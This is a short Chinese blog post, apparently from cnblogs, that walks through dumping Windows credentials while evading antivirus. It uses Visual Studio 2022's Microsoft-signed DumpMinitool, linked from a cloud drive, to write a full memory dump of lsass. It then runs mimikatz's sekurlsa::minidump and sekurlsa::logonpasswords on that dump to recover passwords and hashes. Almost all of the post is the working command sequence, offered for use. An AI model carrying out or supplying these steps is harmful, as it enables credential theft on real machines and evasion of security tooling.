首页 > 其他分享 >Visual Studio2022微软白名单免杀dump lsass

Visual Studio2022微软白名单免杀dump lsass

时间:2023-03-27 16:12:59浏览次数:51  
标签:exe 免杀 dump -- Studio2022 lsass mimikatz DumpMinitool

1.DumpMinitool获取地址

阿里云盘:https://www.aliyundrive.com/s/qk5zmwQm1Mj 提取码: hy87

DumpMinitool所在路径:

D:\XXX\VisualStudioPro_2022\VisualStudio\Common7\IDE\CommonExtensions\Microsoft\TestWindow\VsTest\Extensions\dump

找不见用everything 搜一下 DumpMinitool

2.mimikatz

下载地址:

https://github.com/gentilkiwi/mimikatz

3.DumpMinitool + mimikatz

3.1 获取 lsass进程 PID

tasklist | findstr "lsass"
img

3.2 DumpHash

DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式
img

3.3 本地使用mimikatz解析

mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords
img

大于等于server 2012抓取明文,详见 xxx

标签:exe,免杀,dump,--,Studio2022,lsass,mimikatz,DumpMinitool
From: https://www.cnblogs.com/1nit/p/17261892.html

相关文章

  • golang 实现的零依赖、高性能、并发 mysqldump 工具。
    mysqldumpgolang中实现的零依赖、高性能、并发mysqldump工具。项目地址:https://github.com/dengjiawen8955/mysqldump/blob/master/README-zh.md文章地址:https:/......
  • Exp3-免杀原理
    一、基础问题回答1、杀软是如何检测出恶意代码的?答:(1)检测特征码人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻......
  • Linux操作系统之tcpdump抓包工具详解
    前言①tcpdump工具简介:tcpdump是Linux操作系统中的字符界面的数据抓包分析软件。tcpdump可以将网络中传送的数据包完全截获下来提供分析②tcpdump是一个用于截取网络分......
  • mysqldump + binlog实现增量备份
    1、核心思路搞明白一件事:到底什么是增量备份?答:①要有全量备份②继续增删改数据③再次需要备份时,不需要进行全量备份,只需要备份binlog日志文件即可(因为binlog日志记录了......
  • 使用mysqldump对Mysql进行备份
    文档课题:使用mysqldump对Mysql进行备份.1、理论知识Mysqldump是用于转存储Mysql数据库的实用程序,它可以转储一个或多个MySQL数据库,对其进行备份或传输到远程服务器.其主要产......
  • linux centos yum 单独安装 mysqldump
    在linux下,mysqldump属于mysql的组件,可以安装mysql获取,如:$yum-yinstallmysql-client1一般情况下,是安装mysql的时候获得mysqldump组件,但有时可能已经安装Mar......
  • 如何在jvm dump出的堆文件中查看指定成员数据,或者全局变量
    很多时候,当程序OOM或者其他异常情况时,我们需要搞清楚当时应用内部数据情况,所有某些时候我们需要查看当时内存镜像中某些成员变量的值。比如查看当时内存实例中数据库账号,......
  • linux 网络管理之tcpdump命令详解
    一、tcpdump的作用tcpdump是linux环境的网络数据采集分析工具,也就是所谓的抓包工具,与tcpdump只有命令行格式不同,Windows有个图形可视化工具Wireshark所谓的抓包工具就......
  • qemu-kvm-ev-2.12.0-44.1.el7_8.1 线上热迁移qemu-kvm coredump问题分析
    配置libvirtcoredumo后(https://www.cnblogs.com/maojun1998/p/17215214.html)让测试一直迁移vm,一段时间后出现coredumproot错误码:coredump.sh严重错误,进程coredum......
  • 网络分析工具:nc/tcpdump/wireshark
     ncLinuxnc命令用于设置路由器nc[-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称......